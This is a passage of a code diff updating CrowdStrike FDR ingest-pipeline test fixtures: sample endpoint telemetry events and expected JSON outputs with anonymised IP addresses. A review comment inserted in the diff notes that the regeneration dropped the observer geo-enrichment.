wlidsvc","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3343111420","ContextTimeStamp":"1604855196.468","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\svchost.exe","InterfaceGuid":"367ABB81-9844-35F1-AD32-98F038001003","InterfaceVersion":"131072","RpcClientProcessId":"949196415400","RpcClientThreadId":"44209361549673","RpcNestingLevel":"0","RpcOpNum":"19","ServiceDisplayName":"wlidsvc","TargetProcessId":"955370934902","TokenType":"1","UserName":"user6","aid":"fffffffffcc4413057adc260e99b0774","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ServiceStarted","id":"ffffffff-1111-11eb-9c98-02c501fe7d81","name":"ServiceStartedV2","timestamp":"1604855196635"} 
+{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"203564169","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"319255017313886870","ContextTimeStamp":"1604855200.751","Entitlements":"15","InContext":"0","LocalAddressIP6":"0:0:0:0:0:0:0:0","LocalPort":"0","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:1","RemotePort":"2181","aid":"ffffffffed0f41575620ab9fb25ce105","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkConnectIP6","id":"ffffffff-1111-11eb-81f1-061cdebbd115","name":"NetworkConnectIP6MacV5","timestamp":"1604855200836"} +{"AuthenticationId":"1656178821","AuthenticationPackage":"Kerberos","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"30254389526587","ContextThreadId":"275230771323179","EffectiveTransmissionClass":"2","Entitlements":"15","LogonDomain":"dom1","LogonId":"1656178821","LogonServer":"srv1","LogonTime":"1604855211.249","LogonType":"5","PasswordLastSet":"1530626210.104","RemoteAccount":"1","SessionId":"0","UserCanonical":"","UserFlags":"32","UserIsAdmin":"0","UserLogonFlags":"0","UserName":"user7","UserPrincipal":"user7@dom4.cm","UserSid":"S-1-5-21-606747145-1364589140-725345543-183372","aid":"ffffffff73164cfa9656c4caff8a2a38","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserIdentity","id":"ffffffff-1111-11eb-86e3-02db1faa1327","name":"UserIdentityV2","timestamp":"1604855212031"} +{"AuthenticationId":"999","CommandLine":"C:\\WINDOWS\\System32\\svchost.exe -k netsvcs -p -s 
NetSetupSvc","ConfigBuild":"1007.3.0010609.1","ConfigStateHash":"4193986770","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\svchost.exe","ImageSubsystem":"2","IntegrityLevel":"16384","MD5HashData":"8a0a29438052faed8a2532da50455756","ParentAuthenticationId":"999","ParentProcessId":"2881931477041","ProcessCreateFlags":"525324","ProcessEndTime":"","ProcessParameterFlags":"8193","ProcessStartTime":"1604842733.215","ProcessSxsFlags":"64","RawProcessId":"6160","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"7fd065bac18c5278777ae44908101cdfed72d26fa741367f0ad4d02020787ab6","SessionId":"0","SourceProcessId":"2881931477041","SourceThreadId":"70316664105336","Tags":"27, 29, 53, 54, 55, 185, 10445360464024, 10445360464025, 10445360464026, 10445360464258, 10445360464273, 10445360464274, 12094627905582, 12094627906234, 211655988347297","TargetProcessId":"2882232404222","TokenType":"2","UserSid":"S-1-5-18","WindowFlags":"128","aid":"ffffffffbe8a46386afe80c5ef64d0b5","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-b4f9-06e3a7e5503b","name":"ProcessRollup2V16","timestamp":"1604855237946"} 
+{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1763245019","ContextProcessId":"1016182570608","ContextThreadId":"37343520154472","ContextTimeStamp":"1604829512.519","DesiredAccess":"1179785","EffectiveTransmissionClass":"3","Entitlements":"15","FileAttributes":"0","FileIdentifier":"7a9c1c1610045d45a54bd6643ac12ea767a5020000000c00","FileObject":"18446670458156489088","Information":"1","IrpFlags":"2180","MajorFunction":"0","MinorFunction":"0","OperationFlags":"0","Options":"16777312","ShareAccess":"5","Status":"0","TargetFileName":"\\Device\\HarddiskVolume3\\Users\\user11\\Downloads\\file.pptx","aid":"ffffffffac4148947ed68497e89f3308","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"RansomwareOpenFile","id":"ffffffff-1111-11eb-9756-06fe7f8f682f","name":"RansomwareOpenFileV4","timestamp":"1604855242091"} +{"AllocateVirtualMemoryCount":"0","ArchiveFileWrittenCount":"0","AsepWrittenCount":"0","BinaryExecutableWrittenCount":"0","CLICreationCount":"0","ConHostId":"13532","ConHostProcessId":"1731198143955","ConfigBuild":"1007.3.0010609.1","ConfigStateHash":"2030177841","ContextData":"","ContextProcessId":"1741732942772","ContextThreadId":"28523520529271","ContextTimeStamp":"1604855274.377","CycleTime":"473618996","DirectoryCreatedCount":"0","DirectoryEnumeratedCount":"0","DnsRequestCount":"0","DocumentFileWrittenCount":"0","EffectiveTransmissionClass":"3","Entitlements":"15","ExeAndServiceCount":"0","ExecutableDeletedCount":"0","ExitCode":"0","FileDeletedCount":"0","GenericFileWrittenCount":"0","ImageSubsystem":"2","InjectedDllCount":"0","InjectedThreadCount":"0","KernelTime":"1406250","MaxThreadCount":"16","ModuleLoadCount":"72","NetworkBindCount":"0","NetworkCapableAsepWriteCount":"0","NetworkCloseCount":"0","NetworkConnectCount":"0","NetworkConnectCountUdp":"0","NetworkListenCount":"0","NetworkModuleLoadCount":"0","NetworkRecvAcceptCount":"0","NewExecutableWrittenCount":"0","ParentProcessId":"1731198143955","
PrivilegedProcessHandleCount":"0","ProcessStartTime":"1604855154.465","ProtectVirtualMemoryCount":"0","QueueApcCount":"0","RawProcessId":"18176","RegKeySecurityDecreasedCount":"0","RemovableDiskFileWrittenCount":"0","RunDllInvocationCount":"0","SHA256HashData":"87419b84f34cdb13f699c0f0803c957e48c27ad83334fcad7bac9ad89c0a466f","ScreenshotsTakenCount":"0","ScriptEngineInvocationCount":"0","ServiceEventCount":"0","SetThreadContextCount":"0","SnapshotFileOpenCount":"0","SuspectStackCount":"0","SuspiciousCredentialModuleLoadCount":"0","SuspiciousDnsRequestCount":"0","SuspiciousFontLoadCount":"0","SuspiciousRawDiskReadCount":"0","TargetProcessId":"1741732942772","UnsignedModuleLoadCount":"0","UserMemoryAllocateExecutableCount":"0","UserMemoryAllocateExecutableRemoteCount":"0","UserMemoryProtectExecutableCount":"0","UserMemoryProtectExecutableRemoteCount":"0","UserSid":"S-1-12-1-1647509123-1308660782-3901357462-3999411581","UserTime":"781250","aid":"fffffffffdab492a5a20cd0417395a73","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"EndOfProcess","id":"ffffffff-1111-11eb-b685-0241eaddc553","name":"EndOfProcessV14","timestamp":"1604855276657"} 
+{"AuthenticationId":"895027","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"1786917081743","ContextThreadId":"31685015444484","ContextTimeStamp":"1604855317.892","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"0000000000000000be341bb58bc5f1f2a24339010200510e","FileObject":"18446636933702558240","IrpFlags":"1028","IsOnNetwork":"1","IsOnRemovableDisk":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"223989","TargetFileName":"\\Device\\Mup\\intranet.dev\\int\\Test.pptx","TokenType":"1","aid":"fffffffffa474d216472f3edb73c75ed","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"OoxmlFileWritten","id":"ffffffff-1111-11eb-9165-067ee18a7975","name":"OoxmlFileWrittenV11","timestamp":"1604855329571"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ConnectionDirection":"2","ConnectionFlags":"0","ContextProcessId":"439029805661","ContextThreadId":"273683743193497","ContextTimeStamp":"1604855351.158","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","LocalPort":"50373","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:0","RemotePort":"0","aid":"ffffffff1f924e228a807ea4c0f21b0b","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkListenIP6","id":"ffffffff-1111-11eb-85f5-02ab029194b9","name":"NetworkListenIP6V5","timestamp":"1604855351798"} 
+{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1457965279","ContextProcessId":"321365562189152025","ContextThreadId":"0","ContextTimeStamp":"1604846070.744","Entitlements":"15","SHA256HashData":"e1bed7598ffdecf63a4d240f8309b528fc45068c6cb8137a5090f3afeb57f29d","Size":"29646","TargetFileName":"/System/Library/CoreServices/SecurityAgentPlugins/HomeDirMechanism.bundle/Contents/MacOS/HomeDirMechanism/..namedfork/rsrc","VnodeModificationType":"10","aid":"ffffffff1f32487185fcde66a9dc0528","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"AsepFileChange","id":"ffffffff-1111-11eb-b9b4-063e98f9b19b","name":"AsepFileChangeMacV2","timestamp":"1604855355495"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3011122681","ContextProcessId":"2932136","ContextThreadId":"36157339485804","ContextTimeStamp":"1604855191.803","EffectiveTransmissionClass":"2","Entitlements":"15","LogonTime":"","PasswordLastSet":"","UserLogonFlags":"1","UserName":"user7","UserSid":"S-1-5-10","aid":"ffffffffa5bd4efaa195a7132c576edc","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"UserLogonFailed","id":"ffffffff-1111-11eb-aa5a-0207e26418af","name":"UserLogonFailedV1","timestamp":"1604855193422"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1858880895","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"56042872298","ContextTimeStamp":"1604855136.669","EffectiveTransmissionClass":"3","Entitlements":"15","InContext":"0","LocalAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","LocalPort":"49689","Protocol":"6","RemoteAddressIP6":"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6","RemotePort":"443","aid":"ffffffff6854438eb4181691ec47e43d","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"NetworkConnectIP6","id":"ffffffff-1111-11eb-a889-061944805289","name":"NetworkConnectIP6V5","timestamp":"1604855199798"} 
+{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ContextProcessId":"321382909294815631","ContextThreadId":"0","ContextTimeStamp":"1604853755.987","Entitlements":"15","SHA256HashData":"fa07e991e0c3f3661794bba39061433265162b10cd9036751941cc45e6a4b583","Size":"165","SourceFileName":"/Library/Application Support/JAMF/tmp/.dat.nosync2c98.VBwjsq","TargetFileName":"/Library/Application Support/JAMF/tmp/6B24D2B6-BC17-4470-8078-91A787A19478","aid":"ffffffffc07b49d6b7426e970523671a","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NewExecutableRenamed","id":"ffffffff-1111-11eb-8773-06939a2f0915","name":"NewExecutableRenamedMacV1","timestamp":"1604855213224"} +{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"203564169","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"321367236803434269","ContextTimeStamp":"1604855268.323","Entitlements":"15","InContext":"0","LocalAddressIP6":"0:0:0:0:0:0:0:0","LocalPort":"51076","Protocol":"6","RemoteAddressIP6":"0:0:0:0:0:0:0:0","RemotePort":"0","aid":"ffffffffa60a47af4ebd2a76070f0d4f","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkListenIP6","id":"ffffffff-1111-11eb-9a50-0669ff09604d","name":"NetworkListenIP6MacV5","timestamp":"1604855268755"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3765958535","ContextProcessId":"1611521722601","ContextThreadId":"53405065993811","ContextTimeStamp":"1604855280.307","DomainName":"raw.githubusercontent.com","DualRequest":"0","EffectiveTransmissionClass":"3","Entitlements":"15","InterfaceIndex":"0","RequestType":"1","aid":"ffffffff6d724d38af99c628fb904626","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"SuspiciousDnsRequest","id":"ffffffff-1111-11eb-885e-02ac336efd4b","name":"SuspiciousDnsRequestV2","timestamp":"1604855323217"} 
+{"ConfigBuild":"100.3.0011603.1","ContextProcessId":"4492535979973","ContextThreadId":"14023068415125","ContextTimeStamp":"1604855315.034","DiskParentDeviceInstanceId":"PCI\\VEN_8086\u0026DEV_31E3\u0026SUBSYS_080C1028\u0026REV_03\\3\u002611583659\u00260\u002690","EffectiveTransmissionClass":"3","Entitlements":"15","VolumeDeviceCharacteristics":"131072","VolumeDeviceObjectFlags":"134479872","VolumeDeviceType":"8","VolumeDriveLetter":"C:","VolumeFileSystemDevice":"\\Ntfs","VolumeFileSystemDriver":"\\FileSystem\\Ntfs","VolumeFileSystemType":"2","VolumeIsEncrypted":"0","VolumeMountPoint":"\\??\\Volume{9b46da3f-ce44-432f-9230-c9201504bfd7}","VolumeName":"\\Device\\HarddiskVolume4","VolumeRealDeviceName":"\\Device\\HarddiskVolume4","VolumeSectorSize":"512","aid":"ffffffff1990483499a736373600eef7","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"FsVolumeMounted","id":"ffffffff-1111-11eb-9be9-024459b713c5","name":"FsVolumeMountedV6","timestamp":"1604855329102"} +{"ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1789338890","ConnectionDirection":"0","ConnectionFlags":"0","ContextProcessId":"321210562584146513","ContextTimeStamp":"1604855127.011","Entitlements":"15","InContext":"0","LocalAddressIP4":"127.0.0.1","LocalPort":"53","Protocol":"6","RemoteAddressIP4":"0.0.0.0","RemotePort":"0","aid":"ffffffffe5ff467b4f0c4fd41a4462bb","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"NetworkListenIP4","id":"ffffffff-1111-11eb-ae74-065212970c5d","name":"NetworkListenIP4MacV5","timestamp":"1604855128936"} 
+{"AuthenticationId":"999","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextTimeStamp":"1604855185.108","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume1\\Windows\\System32\\gpsvc.dll","InterfaceGuid":"367ABB81-9844-35F1-AD32-98F038001003","InterfaceVersion":"131072","RpcClientProcessId":"219053851298","RpcClientThreadId":"22047924482692","RpcNestingLevel":"0","RpcOpNum":"19","ServiceDisplayName":"gpsvc","TargetProcessId":"224116976578","TargetThreadId":"22920092479704","TokenType":"1","UserName":"user7","aid":"ffffffff59514ea68b4693ddfb9b6643","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostedServiceStarted","id":"ffffffff-1111-11eb-860c-0606af112d55","name":"HostedServiceStartedV2","timestamp":"1604855184068"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextTimeStamp":"1604855299.018","EffectiveTransmissionClass":"3","Entitlements":"15","ServiceDisplayName":"wuauserv","TargetProcessId":"661455186053","TargetThreadId":"24238019995551","aid":"ffffffff2b5a4bf5afc6682595faa016","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostedServiceStopped","id":"ffffffff-1111-11eb-9b11-0602a5689467","name":"HostedServiceStoppedV1","timestamp":"1604855302512"} 
+{"AuthenticationId":"3443175","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"3338885535","ContextProcessId":"1091372257857","ContextThreadId":"36855848099771","ContextTimeStamp":"1604855227.625","DiskParentDeviceInstanceId":"PCI\\VEN_1179\u0026DEV_0113\u0026SUBSYS_00011179\u0026REV_01\\4\u00263ad42678\u00260\u002600E0","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"f5ce07c6af67ec4ebe0846ff200bfc2f54f7020000002100","FileObject":"18446603341701082336","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"0","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"288041","TargetFileName":"\\Device\\HarddiskVolume3\\Users\\user12\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\TempState\\Downloads\\ex.pdf.8e41hf8.partial","TokenType":"1","aid":"ffffffff32cb4abc50bc133b31a69946","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"PdfFileWritten","id":"ffffffff-1111-11eb-baea-02dccfbb7779","name":"PdfFileWrittenV11","timestamp":"1604855264313"} +{"AuthenticationId":"3783389","CommandLine":"\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" 
-ServerName:App.AppXnme9zjyebb2xnyygh6q9ev6p5d234br2.mca","ConfigBuild":"1007.3.0012309.1","ConfigStateHash":"3998263252","EffectiveTransmissionClass":"3","Entitlements":"15","ImageFileName":"\\Device\\HarddiskVolume3\\Windows\\System32\\backgroundTaskHost.exe","ImageSubsystem":"2","IntegrityLevel":"4096","MD5HashData":"50d5fd1290d94d46acca0585311e74d5","ParentAuthenticationId":"3783389","ParentBaseFileName":"svchost.exe","ParentProcessId":"2439558094566","ProcessCreateFlags":"525332","ProcessEndTime":"","ProcessParameterFlags":"16385","ProcessStartTime":"1604855181.648","ProcessSxsFlags":"1600","RawProcessId":"22272","RpcClientProcessId":"2439558094566","SHA1HashData":"0000000000000000000000000000000000000000","SHA256HashData":"b8e176fe76a1454a00c4af0f8bf8870650d9c33d3e333239a59445c5b35c9a37","SessionId":"1","SourceProcessId":"2439558094566","SourceThreadId":"77538684027214","Tags":"41, 12094627905582, 12094627906234","TargetProcessId":"2450046082233","TokenType":"2","UserSid":"S-1-12-1-3697283754-1083485977-2164330645-2516515886","WindowFlags":"128","aid":"ffffffff655344736aca58d17fb570f0","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"ProcessRollup2","id":"ffffffff-1111-11eb-8462-02ade3b2f949","name":"ProcessRollup2V18","timestamp":"1604855182022"} +{"AuthenticationId":"326190744","AuthenticationUuid":"98467113-C771-4845-B71B-89B3CE9F93C9","AuthenticationUuidAsString":"13714698-71C7-4548-B71B-89B3CE9F93C9","ConfigBuild":"1007.4.0011104.1","ConfigStateHash":"1457965279","Entitlements":"15","UID":"326190744","UserPrincipal":"user8@dom6","UserSid":"S-1-5-21-3629339319-2376021926-2724479216-652382488","aid":"ffffffff1f32487185fcde66a9dc0528","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"UserIdentity","id":"ffffffff-1111-11eb-b9b4-063e98f9b19b","name":"UserIdentityMacV2","timestamp":"1604855355388"} +{"BootArgs":" NOEXECUTE=OPTIN 
HYPERVISORLAUNCHTYPE=AUTO FVEBOOT=2125824 NOVGA","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"1874387338","EffectiveTransmissionClass":"0","Entitlements":"15","MachineDomain":"","aid":"ffffffffcdb543135e7fcdf8e5a8fbdb","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"HostInfo","id":"ffffffff-1111-11eb-9bbd-061290dcd983","name":"HostInfoV2","timestamp":"1604855157555"} +{"AuthenticationId":"703298","ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"2642284486","ContextProcessId":"1161025471861","ContextThreadId":"34929528116709","ContextTimeStamp":"1604851030.593","DiskParentDeviceInstanceId":"USB\\VID_1058\u0026PID_2621\\57583431453939315A4C5255","EffectiveTransmissionClass":"3","Entitlements":"15","FileEcpBitmask":"0","FileIdentifier":"262fbc677256cf4c8d6c6a227285a072c06830873b000000","FileObject":"18446664963104449168","IrpFlags":"1028","IsOnNetwork":"0","IsOnRemovableDisk":"1","MajorFunction":"18","MinorFunction":"0","OperationFlags":"0","Size":"517029","TargetFileName":"\\Device\\HarddiskVolume5\\01.png.tmp$$","TokenType":"1","UserName":"user9","aid":"ffffffff16bf4c7bb5ad755a4722025c","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"GenericFileWritten","id":"ffffffff-1111-11eb-800a-06cecfd73923","name":"GenericFileWrittenV11","timestamp":"1604851031298"} +{"ConfigBuild":"1007.3.0011603.1","ConfigStateHash":"666346415","ContextProcessId":"1717987648455","ContextThreadId":"55064470042288","ContextTimeStamp":"1604850899.164","EffectiveTransmissionClass":"3","Entitlements":"15","VolumeName":"\\Device\\HarddiskVolume27","aid":"ffffffff896b43725b83c79aa79959da","aip":"67.43.156.13","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Win","event_simpleName":"FsVolumeUnmounted","id":"ffffffff-1111-11eb-9f70-0634389d9ea9","name":"FsVolumeUnmountedV2","timestamp":"1604850899812"} 
+{"ConfigBuild":"1007.4.0009906.1","ConfigStateHash":"3429017943","ContextProcessId":"66426035996442255","ContextTimeStamp":"1604851098.548","Entitlements":"15","aid":"ffffffff899541b94b9adff8922aa70a","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022d","event_platform":"Mac","event_simpleName":"FirewallDisabled","id":"ffffffff-1111-11eb-9d4c-02f402df8c1f","name":"FirewallDisabledMacV1","timestamp":"1604851040625"} +{"AgentLoadFlags":"0","AgentLocalTime":"1636436839.9529998","AgentTimeOffset":"125.319","AgentVersion":"6.31.14404.0","BiosManufacturer":"Apple Inc.","BiosVersion":"1554.140.20.0.0 (iBridge: 18.16.14759.0.1,0)","ChassisType":"Laptop","City":"San Francisco","ComputerName":"mac1","ConfigBuild":"1007.4.0014404.1","ConfigIDBuild":"14404","Continent":"North America","Country":"United States","FalconGroupingTags":"-","FirstSeen":"1625682391.0","HostHiddenStatus":"Visible","MachineDomain":"none","OU":"none","PointerSize":"none","ProductType":"1","SensorGroupingTags":"-","ServicePackMajor":"none","SiteName":"none","SystemManufacturer":"Apple Inc.","SystemProductName":"MacBookPro16,2","Time":"1636448427.3539999","Timezone":"America/Los_Angeles","Version":"Big Sur (11.0)","aid":"fffffffffffaaaaaaaaabbbbbbbb","aip":"67.43.156.14","cid":"ffffffff30a3407dae27d0503611022ff","event_platform":"Mac"} \ No newline at end of file diff --git a/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json b/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json index ef3e5b50a36..bd9effe6e83 100644 --- a/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json +++ b/packages/crowdstrike/data_stream/fdr/_dev/test/pipeline/test-fdr.log-expected.json 
@@ -27,21 +27,12 @@
 "preserve_original_event"
 ],
 "observer": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "208.210.242.193",
- "vendor": "crowdstrike",
- "ip": "208.210.242.193",
 "serial_number": "ffffffffa63e404bba4bff7465ab3afb",
+ "address": "67.43.156.14",
 "type": "agent",
- "version": "1007.4.0013701.1"
+ "version": "1007.4.0013701.1",
+ "vendor": "crowdstrike",
+ "ip": "67.43.156.14"
 },
 "@timestamp": "2021-07-07T17:05:21.137Z",
 "ecs": {
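Review bot: The regenerated observer block drops the whole `observer.geo` object instead of updating it for the new address, so this fixture now asserts that `observer.ip` receives no geo enrichment at all; the same removal appears in the hunks at -113, -206, -311, -373 and -478. If the pipeline still runs a geoip processor on `observer.ip`, the lookup for 67.43.156.14 presumably returned nothing in the test database and the fixture quietly locks that missing enrichment in; if the processor was removed on purpose, that is not visible from this diff. Confirming against the pipeline definition seems worthwhile, since `source` and `destination` still gain geo and AS data in the -190 hunk. The reordering of `address`, `vendor` and `ip` after `serial_number` is regeneration order only and changes nothing.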
@@ -49,18 +40,18 @@ }, "related": { "hosts": [ - "208.210.242.193" + "67.43.156.14" ], "hash": [ "1620585913" ], "ip": [ - "208.210.242.193" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465427800Z", - "original": "{\"ParentProcessId\":\"362225661973273550\",\"SourceProcessId\":\"362225661973273550\",\"aip\":\"208.210.242.193\",\"SessionProcessId\":\"363970027584976556\",\"SyntheticPR2Flags\":\"8\",\"event_platform\":\"Mac\",\"SVUID\":\"501\",\"id\":\"ffffffff-1111-11eb-8dd4-061759968cdf\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677521162\",\"ProcessGroupId\":\"363970027584976556\",\"event_simpleName\":\"SyntheticProcessRollup2\",\"RawProcessId\":\"9505\",\"ContextTimeStamp\":\"1625677521.137\",\"GID\":\"20\",\"ConfigStateHash\":\"1620585913\",\"SVGID\":\"20\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"501\",\"CommandLine\":\"/bin/sh -s unix:cmd\",\"TargetProcessId\":\"363970027584976556\",\"ImageFileName\":\"/bin/sh\",\"RGID\":\"501\",\"SourceThreadId\":\"0\",\"Entitlements\":\"15\",\"name\":\"SyntheticProcessRollup2MacV3\",\"RUID\":\"501\",\"aid\":\"ffffffffa63e404bba4bff7465ab3afb\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150573500Z", + "original": "{\"ParentProcessId\":\"362225661973273550\",\"SourceProcessId\":\"362225661973273550\",\"aip\":\"67.43.156.14\",\"SessionProcessId\":\"363970027584976556\",\"SyntheticPR2Flags\":\"8\",\"event_platform\":\"Mac\",\"SVUID\":\"501\",\"id\":\"ffffffff-1111-11eb-8dd4-061759968cdf\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677521162\",\"ProcessGroupId\":\"363970027584976556\",\"event_simpleName\":\"SyntheticProcessRollup2\",\"RawProcessId\":\"9505\",\"ContextTimeStamp\":\"1625677521.137\",\"GID\":\"20\",\"ConfigStateHash\":\"1620585913\",\"SVGID\":\"20\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"501\",\"CommandLine\":\"/bin/sh -s 
unix:cmd\",\"TargetProcessId\":\"363970027584976556\",\"ImageFileName\":\"/bin/sh\",\"RGID\":\"501\",\"SourceThreadId\":\"0\",\"Entitlements\":\"15\",\"name\":\"SyntheticProcessRollup2MacV3\",\"RUID\":\"501\",\"aid\":\"ffffffffa63e404bba4bff7465ab3afb\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:21.162Z", "kind": "event", "action": "SyntheticProcessRollup2", @@ -113,21 +104,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.254.115.95", - "vendor": "crowdstrike", - "ip": "208.254.115.95", "serial_number": "ffffffff3c0846978560dbc0048d6555", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:23.068Z", "ecs": { 
@@ -135,18 +117,18 @@ }, "related": { "hosts": [ - "208.254.115.95" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.254.115.95" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465437600Z", - "original": "{\"FileDeletedCount\":\"0\",\"DirectoryCreatedCount\":\"0\",\"ContextThreadId\":\"0\",\"aip\":\"208.254.115.95\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"event_platform\":\"Mac\",\"NetworkBindCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"id\":\"ffffffff-1111-11eb-9d75-02bcf3ade03b\",\"NewExecutableWrittenCount\":\"0\",\"NetworkCloseCount\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"SuspectStackCount\":\"0\",\"timestamp\":\"1625677524102\",\"event_simpleName\":\"EndOfProcess\",\"RawProcessId\":\"33454\",\"ContextTimeStamp\":\"1625677523.068\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053603452626914\",\"AsepWrittenCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"NetworkCapableAsepWriteCount\":\"0\",\"ExecutableDeletedCount\":\"0\",\"TargetProcessId\":\"365053603452626914\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"name\":\"EndOfProcessMacV15\",\"aid\":\"ffffffff3c0846978560dbc0048d6555\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150583Z", + "original": 
